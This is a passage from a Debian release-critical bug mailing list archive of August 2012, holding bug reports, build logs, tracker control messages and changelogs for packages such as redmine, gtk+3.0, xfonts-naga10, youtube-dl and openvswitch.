make[3]: *** [src/CMakeFiles/wv2.dir/styles.cpp.o] Error 1
make[3]: Leaving directory `/tmp/buildd/wv2-0.4.2.dfsg.1/obj-i486-linux-gnu'
make[2]: *** [src/CMakeFiles/wv2.dir/all] Error 2
make[2]: Leaving directory `/tmp/buildd/wv2-0.4.2.dfsg.1/obj-i486-linux-gnu'
make[1]: *** [all] Error 2
make[1]: Leaving directory `/tmp/buildd/wv2-0.4.2.dfsg.1/obj-i486-linux-gnu'
dh_auto_build: make -j1 returned exit code 2
make: *** [build] Error 2
dpkg-buildpackage: error: debian/rules build gave error exit status 2

Since the only wv2 user in the archive is (AFAICT) Calligra, it has a 
substantially developed fork, and it looks like the original wv2 upstream is 
dead (last release in 2009), perhaps it's better just to remove it.

Scott K

signature.asc
Description: This is a digitally signed message part.


Bug#684067: redmine postgresql backend fails in redmine clean instalation (whatever version 1.4.3, 1.4.4 or 1.4.2)

2012-08-06 Thread PICCORO McKAY Lenz
i have news, some outputs, i tested and confirmed other ruby apps can
coonenct and i can setup redmine perfectly by hand but dbconfig-common
not! this its very severy

the problem its that default database for new users in postgres engine
are same as user connected, testin fount it:

root@sys001web:/etc/redmine/default# psql -h localhost -U redmine -W
Contraseña para usuario redmine:
psql: FATAL:  no existe la base de datos redmine
root@sys001web:/etc/redmine/default#
root@sys001web:/etc/redmine/default# su - postgres
postgres@sys001web:~$ createdb -O redmine redmine redmine
postgres@sys001web:~$ ^D
postgres@sys001web:~$ logout
root@sys001web:/etc/redmine/default# psql -h localhost -U redmine -W
Contraseña para usuario redmine:
psql (9.1.3)
conexión SSL (cifrado: DHE-RSA-AES256-SHA, bits: 256)
Digite «help» para obtener ayuda.

redmine= \q
root@sys001web:/etc/redmine/default#

then i reconfigured a found this:

dbconfig-common: writing config to
/etc/dbconfig-common/redmine/instances/default.conf

Creating config file /etc/redmine/default/database.yml.new with new version
creating postgres user redmine:  already exists.
resetting password:  success.
creating database redmine_default: already exists.
dbconfig-common: flushing administrative password
Populating database for redmine instance default.
This may take a while.
NOTE: Gem.source_index is deprecated, use Specification. It will be
removed on or after 2011-11-01.
Gem.source_index called from
/usr/share/redmine/config/../vendor/rails/railties/lib/rails/gem_dependency.rb:21.
Please install RDoc 2.4.2+ to generate documentation.
rake aborted!
el servidor ha cerrado la conexión inesperadamente
Probablemente se debe a que el servidor terminó de manera anormal
antes o durante el procesamiento de la petición.

Tasks: TOP = db:migrate = environment
(See full trace by running task with --trace)
Error when running rake db:migrate, check database configuration.
exit: 295: Illegal number: -1
dpkg: error al procesar redmine (--configure):
 el subproceso instalado el script post-installation devolvió el
código de salida de error 2


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: Re: Bug#683984: libapache2-mod-rpaf: potential Denial of Service

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 fixed 683984 0.6-1
Bug #683984 [libapache2-mod-rpaf] libapache2-mod-rpaf: potential Denial of 
Service
Marked as fixed in versions libapache2-mod-rpaf/0.6-1.

End of message, stopping processing here.

Please contact me if you need assistance.
-- 
683984: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=683984
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#682058: marked as done (xfonts-naga10: FTBFS: BDF Error on line 1: bad 'STARTFONT' \n bdftopcf: bdf input, knj10I.bdf, corrupt)

2012-08-06 Thread Debian Bug Tracking System
Your message dated Mon, 06 Aug 2012 19:48:04 +
with message-id e1sythy-0002rg...@franck.debian.org
and subject line Bug#682058: fixed in xfonts-naga10 1.1-13.1
has caused the Debian Bug report #682058,
regarding xfonts-naga10: FTBFS: BDF Error on line 1: bad 'STARTFONT' \n 
bdftopcf: bdf input, knj10I.bdf, corrupt
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
682058: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=682058
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: xfonts-naga10
Version: 1.1-13
Severity: serious
User: debian...@lists.debian.org
Usertags: piuparts

Hi,

rebuilding xfonts-naga10 in a clean sid chroot fails:

 debian/rules build
dh_testdir
# Add here commands to configure the package.
chmod a+x debian/mkbold debian/mkitalic
touch configure-stamp
dh_testdir
# Add here commands to compile the package.
#/usr/bin/make
#/usr/bin/docbook-to-man debian/xfonts-naga10.sgml  xfonts-naga10.1
patch -o maru10.bdf  maru10.bdf.diff
patching file knj10.bdf
patch -o min10.bdf  min10.bdf.diff
patching file knj10.bdf
bdftopcf -o maru10.pcf maru10.bdf
bdftopcf -o min10.pcf min10.bdf
bdftopcf -o 5x10B.pcf 5x10B.bdf
bdftopcf -o 5x10rk.pcf 5x10rk.bdf
bdftopcf -o knj10.pcf knj10.bdf
bdftopcf -o 5x10a.pcf 5x10a.bdf
bdftopcf -o knj10B.pcf knj10B.bdf
# mkbold
debian/mkbold -V maru10.bdf  maru10B.bdf
debian/mkbold -V min10.bdf  min10B.bdf
#debian/mkbold -V 5x10rk.bdf  5x10rkB.bdf
bdftopcf -o maru10B.pcf maru10B.bdf
bdftopcf -o min10B.pcf min10B.bdf
#bdftopcf -o 5x10rkB.pcf 5x10rkB.bdf
# mkitalic
debian/mkitalic -V knj10.bdf  knj10I.bdf
debian/mkitalic -V knj10B.bdf  knj10BI.bdf
debian/mkitalic -V maru10.bdf  maru10I.bdf
debian/mkitalic -V maru10B.bdf  maru10BI.bdf
debian/mkitalic -V min10.bdf  min10I.bdf
debian/mkitalic -V min10B.bdf  min10BI.bdf
debian/mkitalic -V 5x10a.bdf  5x10aI.bdf
debian/mkitalic -V 5x10B.bdf  5x10BI.bdf
#debian/mkitalic -V 5x10rk.bdf  5x10rkI.bdf
#debian/mkitalic -V 5x10rkB.bdf  5x10rkBI.bdf
bdftopcf -o knj10I.pcf knj10I.bdf
BDF Error on line 1: bad 'STARTFONT'
bdftopcf: bdf input, knj10I.bdf, corrupt
make: *** [build-stamp] Error 1
dpkg-buildpackage: error: debian/rules build gave error exit status 2


I wanted to test rebuilding the package with current dh_installxfonts
which should produce maintainer scripts that properly cleanup on
removal.


cheers,

Andreas
---End Message---
---BeginMessage---
Source: xfonts-naga10
Source-Version: 1.1-13.1

We believe that the bug you reported is fixed in the latest version of
xfonts-naga10, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 682...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Luca Falavigna dktrkr...@debian.org (supplier of updated xfonts-naga10 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Sat, 04 Aug 2012 21:22:56 +0200
Source: xfonts-naga10
Binary: xfonts-naga10
Architecture: source all
Version: 1.1-13.1
Distribution: unstable
Urgency: medium
Maintainer: GOTO Masanori go...@debian.org
Changed-By: Luca Falavigna dktrkr...@debian.org
Description: 
 xfonts-naga10 - 10x10 dot Japanese and ISO-8859-1 naga10 fonts
Closes: 682058
Changes: 
 xfonts-naga10 (1.1-13.1) unstable; urgency=medium
 .
   * Non-maintainer upload.
   * debian/mkitalic:
 - Use #!/usr/bin/gawk --exec to fix gawk behaviour while parsing
   script options (Closes: #682058).
Checksums-Sha1: 
 07daebf7067827bbb46cd420d67a06ae54029454 1728 xfonts-naga10_1.1-13.1.dsc
 66df5da46512ad376bbf62b4f9a29728553f88c6 7298 xfonts-naga10_1.1-13.1.diff.gz
 76a1da76b86c83661d9d80fa3c7778a84016da62 1353724 xfonts-naga10_1.1-13.1_all.deb
Checksums-Sha256: 
 552847b5decb0a54123496771eb299f641808a1961efa09b882ac2f3a08b9a19 1728 
xfonts-naga10_1.1-13.1.dsc
 808ae2fcf0e23e47c04f61405242df44586e8911d8f9d549625717255b41801d 7298 
xfonts-naga10_1.1-13.1.diff.gz
 f59531ee97db17c77317eb498a067a243559b9a24d9abb99b915d7a570ff9bcb 1353724 
xfonts-naga10_1.1-13.1_all.deb
Files: 
 99a642f133f224f289be190320be1182 1728 non-free/x11 optional 
xfonts-naga10_1.1-13.1.dsc
 de59828ceedaf143c8d0a12a79237751 7298 non-free/x11 optional 
xfonts-naga10_1.1-13.1.diff.gz
 

Bug#674556: #674556 gtk-recordmydesktop: hides main menubar in gnome3 making desktop unusable

2012-08-06 Thread Timo Juhani Lindfors
gregor herrmann gre...@debian.org writes:
 (Just guessing, I don't plan to install Gnome to check it out :))

When I heard that ctrl-shift-R in gnome3 starts the builtin screencast
function I don't need gtk-recordmydesktop anymore so my motivation to
fix this bug is also quite low.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#681198: marked as done (libgtk-3-0: removal of libgtk-3-0 makes files disappear from libgtk-3-common)

2012-08-06 Thread Debian Bug Tracking System
Your message dated Mon, 06 Aug 2012 20:48:17 +
with message-id e1syudp-0005au...@franck.debian.org
and subject line Bug#681198: fixed in gtk+3.0 3.4.2-3
has caused the Debian Bug report #681198,
regarding libgtk-3-0: removal of libgtk-3-0 makes files disappear from 
libgtk-3-common
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
681198: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=681198
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: libgtk-3-0
Version: 3.4.2-2
Severity: serious
User: debian...@lists.debian.org
Usertags: piuparts

Hi,

during a test with piuparts I noticed your package causes
removal of files that also belong to another package.

From the attached log (scroll to the bottom...):

0m28.0s ERROR: FAIL: After purging files have disappeared:
  /etc/gtk-3.0/  owned by: libgtk-3-common
  /etc/gtk-3.0/im-multipress.confowned by: libgtk-3-common


cheers,

Andreas


libgtk-3-0_3.4.2-2.log.gz
Description: GNU Zip compressed data
---End Message---
---BeginMessage---
Source: gtk+3.0
Source-Version: 3.4.2-3

We believe that the bug you reported is fixed in the latest version of
gtk+3.0, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 681...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Michael Biebl bi...@debian.org (supplier of updated gtk+3.0 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Mon, 06 Aug 2012 21:40:53 +0200
Source: gtk+3.0
Binary: libgtk-3-0 libgtk-3-0-udeb libgtk-3-common libgtk-3-bin libgtk-3-dev 
libgtk-3-0-dbg libgtk-3-doc gtk-3-examples gir1.2-gtk-3.0 libgail-3-0 
libgail-3-dev libgail-3-0-dbg libgail-3-doc
Architecture: source all amd64
Version: 3.4.2-3
Distribution: unstable
Urgency: low
Maintainer: Debian GNOME Maintainers 
pkg-gnome-maintain...@lists.alioth.debian.org
Changed-By: Michael Biebl bi...@debian.org
Description: 
 gir1.2-gtk-3.0 - GTK+ graphical user interface library -- gir bindings
 gtk-3-examples - example files for GTK+ 3
 libgail-3-0 - GNOME Accessibility Implementation Library -- shared libraries
 libgail-3-0-dbg - Gail libraries and debugging symbols
 libgail-3-dev - GNOME Accessibility Implementation Library -- development files
 libgail-3-doc - documentation files of the Gail library
 libgtk-3-0 - GTK+ graphical user interface library
 libgtk-3-0-dbg - GTK+ libraries and debugging symbols
 libgtk-3-0-udeb - GTK+ graphical user interface library - minimal runtime 
(udeb)
 libgtk-3-bin - programs for the GTK+ graphical user interface library
 libgtk-3-common - common files for the GTK+ graphical user interface library
 libgtk-3-dev - development files for the GTK+ library
 libgtk-3-doc - documentation for the GTK+ graphical user interface library
Closes: 669694 679754 681198
Changes: 
 gtk+3.0 (3.4.2-3) unstable; urgency=low
 .
   [ Josselin Mouette ]
   * Update xrandr epoch.
 .
   [ Michael Biebl ]
   * debian/libgtk-3-0.postrm.in: Drop rm -rf /etc/gtk-3.0/ on purge since
 this removes files owned by libgtk-3-common. Those bits were copied over
 from the gtk+2.0 package but they are actually obsolete and no longer
 required. Closes: #681198
   * debian/patches/073_transparent_colors.patch: Handle transparent colors
 better in GtkStyle emulation. Patch cherry-picked from upstream Git.
 Closes: #669694
   * debian/patches/070_revert-widget-set-up-signals-after-initializing.patch:
 This patch was a temporary workaround for a bug in mutter which has been
 fixed in version 3.4. It was not supposed to be shipped as part of wheezy,
 so drop it again.
   * If the NEWS or README file is larger than 4k in size append a .gz suffix
 as dh_compress will compress those files. This avoids dangling symlinks.
 Closes: #679754
Checksums-Sha1: 
 aa60dc5658d72faa4c5529973170610508cce068 3411 gtk+3.0_3.4.2-3.dsc
 acdef6e86899366f1055cf39a0ce1e88e2076e47 90013 gtk+3.0_3.4.2-3.debian.tar.gz
 0c77580caf37f0b81ac4dd650bea9008a6a98de8 2712082 
libgtk-3-common_3.4.2-3_all.deb
 b98ebbde329057ebf9c796ff744cd0854d57768c 2055304 libgtk-3-doc_3.4.2-3_all.deb
 e7a4e8302485b797bb690eed263b7ee42ea46d3c 59876 

Bug#684091: id-utils: info documentation is non-free

2012-08-06 Thread Francesco Poli (wintermute)
Package: id-utils
Version: 4.5-3
Severity: serious
Justification: Policy 2.2.1
User: debian-rele...@lists.debian.org
Usertags: nonfree-doc gfdl


Hello,
according to bug #644131 [1], the info documentation shipped with
this package (/usr/share/info/idutils.info.gz and
id-utils-4.5/doc/idutils.info) is licensed under the terms of
the GFDL v1.3 or later *with* Front-Cover and Back-Cover Texts.

[1] http://bugs.debian.org/644131

According to GR-2006-001 [2], only GFDL-licensed works that don't
include any Invariant Sections, Cover Texts, Acknowledgements, and
Dedications (or that do, but permission to remove them is explicitly
granted), are suitable for the main component of our distribution.

[2] http://www.debian.org/vote/2006/vote_001

As a consequence, I think that this info documentation cannot be
included in a package shipped in Debian main.

If the copyright holder cannot be persuaded to re-license, or
dual-license, in a DFSG-free manner (which is unlikely, given
the track record of the FSF on this front... but please note that
there's an alternative method [3]), it is my understanding
that the only solutions left are:

 A) remove the info documentation from the package

 B) move the info documentation to a separate source package to be
shipped in non-free

[3] http://bugs.debian.org/281639#48

Please fix this issue.
Thanks for your time.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#680796: Lazy workaround for failing tests

2012-08-06 Thread Florian Schlichting
forwarded 680796 https://rt.cpan.org/Public/Bug/Display.html?id=78821
thanks

downgrading Catalyst-Plugin-SubRequest (part of
libcatalyst-modules-perl) from 0.18 to 0.17 fixes the test failure.
Version 0.18 Changes reads Major refactor using Plack

I'm not reassigning to libcatalyst-modules-perl yet, because I'm in no
position to judge whether MojoMojo is using the the API correctly, or
what part of the not-that-big refactor is causing the breakage.
Hopefully, upstream can sort this out.

I note that a wishlist bug calls for Catalyst-Plugin-SubRequest to be
deprecated (https://rt.cpan.org/Public/Bug/Display.html?id=57544); on
the other hand, http://mojomojo.org/ seems to be thoroughly and
permanently vandalized...

Florian


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#681850: ia32-libs-gtk (20120705) lists an unavailable dependency on sid (ia32-libs-gtk-i386)

2012-08-06 Thread Marcelo Juchem
Package: ia32-libs-gtk
Version: 20120102
Followup-For: Bug #681850

Trying to upgrade pachage ia32-libs-gtk from 20120102 to 20120705 on Debian
Unstable but one of its dependencies (ia32-libs-gtk-i386) is unavailable even
after enabling multiarch with the dpkg add architecture command line. Can't
upgrade the package due to that.

-- System Information:
Debian Release: wheezy/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.2.0-3-rt-amd64 (SMP w/4 CPU cores; PREEMPT)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages ia32-libs-gtk depends on:
ii  ia32-libs 20120701
ii  lib32asound2  1.0.25-4
ii  lib32gcc1 1:4.7.1-6
ii  lib32stdc++6  4.7.1-6
ii  lib32z1   1:1.2.7.dfsg-13
ii  libc6-i3862.13-35

ia32-libs-gtk recommends no packages.

ia32-libs-gtk suggests no packages.

-- no debconf information


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: Re: Bug#680796: Lazy workaround for failing tests

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 forwarded 680796 https://rt.cpan.org/Public/Bug/Display.html?id=78821
Bug #680796 [src:libmojomojo-perl] libmojomojo-perl: FTBFS: tests failed
Set Bug forwarded-to-address to 
'https://rt.cpan.org/Public/Bug/Display.html?id=78821'.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
680796: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=680796
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: cloning 682455, reassign -1 to llvm-3.0-runtime, reassign -2 to 2.9-runtime, affects 684030 ...

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 clone 682455 -1 -2
Bug #682455 [llvm-3.1-runtime] llvm-X.Y-runtime: fails to deregister the binfmt 
during removal
Bug 682455 cloned as bugs 684094-684095
 reassign -1 llvm-3.0-runtime 3.0-10
Bug #684094 [llvm-3.1-runtime] llvm-X.Y-runtime: fails to deregister the binfmt 
during removal
Bug reassigned from package 'llvm-3.1-runtime' to 'llvm-3.0-runtime'.
No longer marked as found in versions llvm-3.1/3.1-2.
Ignoring request to alter fixed versions of bug #684094 to the same values 
previously set
Bug #684094 [llvm-3.0-runtime] llvm-X.Y-runtime: fails to deregister the binfmt 
during removal
Marked as found in versions llvm-3.0/3.0-10.
 reassign -2 2.9-runtime 2.9+dfsg-7
Bug #684095 [llvm-3.1-runtime] llvm-X.Y-runtime: fails to deregister the binfmt 
during removal
Bug reassigned from package 'llvm-3.1-runtime' to '2.9-runtime'.
Warning: Unknown package '2.9-runtime'
Warning: Unknown package '2.9-runtime'
No longer marked as found in versions llvm-3.1/3.1-2.
Warning: Unknown package '2.9-runtime'
Warning: Unknown package '2.9-runtime'
Ignoring request to alter fixed versions of bug #684095 to the same values 
previously set
Warning: Unknown package '2.9-runtime'
Bug #684095 [2.9-runtime] llvm-X.Y-runtime: fails to deregister the binfmt 
during removal
Warning: Unknown package '2.9-runtime'
There is no source info for the package '2.9-runtime' at version '2.9+dfsg-7' 
with architecture ''
Unable to make a source version for version '2.9+dfsg-7'
Marked as found in versions 2.9+dfsg-7.
Warning: Unknown package '2.9-runtime'
 affects 684030 + libctl-dev
Bug #684030 [libctl5] libctl5: fails to upgrade from 'sid' - trying to 
overwrite /usr/share/libctl/utils/geom.c
Added indication that 684030 affects libctl-dev
 affects 684031 + ocaml-interp libllvm-ocaml-dev
Bug #684031 [ocaml-compiler-libs] ocaml-compiler-libs: fails to upgrade from 
'sid' - trying to overwrite /usr/lib/ocaml/topdirs.cmi
Added indication that 684031 affects ocaml-interp and libllvm-ocaml-dev
 affects 684032 + fcitx-libpinyin
Bug #684032 [libpinyin2] libpinyin2: fails to upgrade from 'sid' - trying to 
overwrite /usr/lib/x86_64-linux-gnu/libpinyin/data/pinyin_index.bin
Added indication that 684032 affects fcitx-libpinyin
 found 684032 fcitx-libpinyin/0.2.0-1
Bug #684032 [libpinyin2] libpinyin2: fails to upgrade from 'sid' - trying to 
overwrite /usr/lib/x86_64-linux-gnu/libpinyin/data/pinyin_index.bin
Marked as found in versions fcitx-libpinyin/0.2.0-1.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
682455: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=682455
684030: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=684030
684031: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=684031
684032: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=684032
684094: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=684094
684095: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=684095
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: severity of 668297 is serious

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 # this package cannot be installed in a new wheezy box
 severity 668297 serious
Bug #668297 [dotclear] dotclear: Admin interface unusable after initial 
installation
Severity set to 'serious' from 'important'
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
668297: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=668297
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#668297: dotclear: Admin interface unusable after initial installation

2012-08-06 Thread Vincent Danjean
Package: dotclear
Followup-For: Bug #668297

  Hi,

  I just raised the severity of this bug to make it RC.
When installing this package on a new wheezy computer,
we cannot get the admin interface at all due to this bug.
In the current state, dotclear must not be included in
wheezy.
  It seems that a workaround exists.
  It seems to me that it would not be difficult to include
it in the Debian package.
  But I do not know dotclear enough to be sure and I've
no indication why the package maintainer did not do anything
since April (not even call for help with the corresponding tag).

  Hoping this can be fixed for wheezy,
Vincent


-- System Information:
Debian Release: wheezy/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 
'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386 armel mipsel

Kernel: Linux 3.2.0-3-amd64 (SMP w/8 CPU cores)
Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#679182: logkeys: FTBFS on mips*: braces around scalar initializer for type 'unsigned int'

2012-08-06 Thread Vedran Furač
On 07/27/2012 10:33 PM, Scott Howard wrote:

 It still FTBFS with the new package from mentors/svn:
 
 upload.cc:87:30: error: braces around scalar initializer for type ‘unsigned 
 int’
 logkeys.cc:154:30: error: braces around scalar initializer for type
 ‘unsigned int’

I've applied a patch that might have fixed this, could you test version
0.1.1a+svn20120529-2 from mentors?

Thanks,
Vedran


attachment: vedran_furac.vcf

Bug#682412: dynamips: FTBFS with multiarch paths: cc: error: /usr/lib/libelf.a: No such file or directory

2012-08-06 Thread Nobuhiro Iwamatsu
tags 682412 patch
thanks

Hi,

I created a patch which revise this bug.
I attached. Please check and apply.

Best regards,
  Nobuhiro

-- 
Nobuhiro Iwamatsu
   iwamatsu at {nigauri.org / debian.org}
   GPG ID: 40AD1FA6


dynamips-0.2.7-0.2.8RC2.debdiff
Description: Binary data


Processed: Re: dynamips: FTBFS with multiarch paths: cc: error: /usr/lib/libelf.a: No such file or directory

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 tags 682412 patch
Bug #682412 [dynamips] dynamips: FTBFS with multiarch paths: cc: error: 
/usr/lib/libelf.a: No such file or directory
Added tag(s) patch.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
682412: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=682412
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#647407: marked as done (youtube-dl: FTBFS: /usr/bin/env: python: No such file or directory)

2012-08-06 Thread Debian Bug Tracking System
Your message dated Tue, 07 Aug 2012 01:17:31 +
with message-id e1syyqm-0001bf...@franck.debian.org
and subject line Bug#647407: fixed in youtube-dl 2012.02.27+gita171dbf-3
has caused the Debian Bug report #647407,
regarding youtube-dl: FTBFS: /usr/bin/env: python: No such file or directory
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
647407: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=647407
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: youtube-dl
Version: 2011.10.19-2
Severity: serious
Justification: fails to build

youtube-dl FTBFS because it's missing a build-dependency on python.

Build log:

   dh_auto_build
make[1]: Entering directory `/tmp/buildd/youtube-dl-2011.10.19'
/usr/bin/env: python: No such file or directory
../youtube-dl --version  LATEST_VERSION
/usr/bin/env: python: No such file or directory
make[1]: *** [update-latest] Error 127
make[1]: Leaving directory `/tmp/buildd/youtube-dl-2011.10.19'
dh_auto_build: make -j1 returned exit code 2
make: *** [build] Error 2
dpkg-buildpackage: error: debian/rules build gave error exit status 2


---End Message---
---BeginMessage---
Source: youtube-dl
Source-Version: 2012.02.27+gita171dbf-3

We believe that the bug you reported is fixed in the latest version of
youtube-dl, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 647...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Rogério Brito rbr...@ime.usp.br (supplier of updated youtube-dl package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Mon, 06 Aug 2012 22:11:25 -0300
Source: youtube-dl
Binary: youtube-dl
Architecture: source all
Version: 2012.02.27+gita171dbf-3
Distribution: unstable
Urgency: low
Maintainer: Rogério Brito rbr...@ime.usp.br
Changed-By: Rogério Brito rbr...@ime.usp.br
Description: 
 youtube-dl - downloader of videos from YouTube and other sites
Closes: 647407
Changes: 
 youtube-dl (2012.02.27+gita171dbf-3) unstable; urgency=low
 .
   * Add python to build-depends-indep. (Closes: #647407)
Checksums-Sha1: 
 6b54f481d36759408cac4cfb6d6747fd1ff272fa 1397 
youtube-dl_2012.02.27+gita171dbf-3.dsc
 e7f9ef4cbf36cc60d610eff387ab936a34e66a3b 11791 
youtube-dl_2012.02.27+gita171dbf-3.debian.tar.gz
 1f99d34168f44e074a0b45ffd4bac8f73124d6ba 54764 
youtube-dl_2012.02.27+gita171dbf-3_all.deb
Checksums-Sha256: 
 310d33a1dc65e649b80254de6df61548a7d0bcc23759c8f450ab9daa1b0b57b2 1397 
youtube-dl_2012.02.27+gita171dbf-3.dsc
 7c2abd5fd02b6f22afc2e8e2081f51ad8dd13919e1d0cfdb7c7764cd354511f6 11791 
youtube-dl_2012.02.27+gita171dbf-3.debian.tar.gz
 6192e73ba61f0ad46efcc47eda70c2c358b303a9fee829cc92e1533b3308a9fa 54764 
youtube-dl_2012.02.27+gita171dbf-3_all.deb
Files: 
 e51f2121821f9199ea205a8617e346f7 1397 web extra 
youtube-dl_2012.02.27+gita171dbf-3.dsc
 6c910d143435c36ac2ff33916fb3d286 11791 web extra 
youtube-dl_2012.02.27+gita171dbf-3.debian.tar.gz
 93a36fe0746aa218a4eb11301f1e5dc0 54764 web extra 
youtube-dl_2012.02.27+gita171dbf-3_all.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlAga44ACgkQCFqbMnwsrrgZ4QCfUIWuu/THDYXro5ILxMuHAYyB
2NkAn3w+xnCgOIUa8daP33wZjrFh5qwY
=eptZ
-END PGP SIGNATUREEnd Message---


Bug#684057: openvswitch-switch - Does not start with upstream openvswitch module

2012-08-06 Thread Ben Pfaff
severity 684057 important
thanks

On Mon, Aug 06, 2012 at 05:26:28PM +0200, Bastian Blank wrote:
 Package: openvswitch-switch
 Version: 1.4.2+git20120612-8
 Severity: grave
 
 The openvswitch-switch init script fails if openvswitch included in
 Linux should be used.

The openvswitch kernel module was only integrated into Linux as of
version 3.3.  You appear to be running a 3.5 kernel from
experimental.  That's the reason you have a problem.

As far as I can tell, in fact, wheezy doesn't contain any kernel new
enough to have the openvswitch kernel module, so it's hard for me to
see how this is a grave bug, or even a release-critical one.  It
could still be awfully inconvenient over time, though, as wheezy users
start using backported kernels, so I'm changing the severity to
important rather than just normal.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
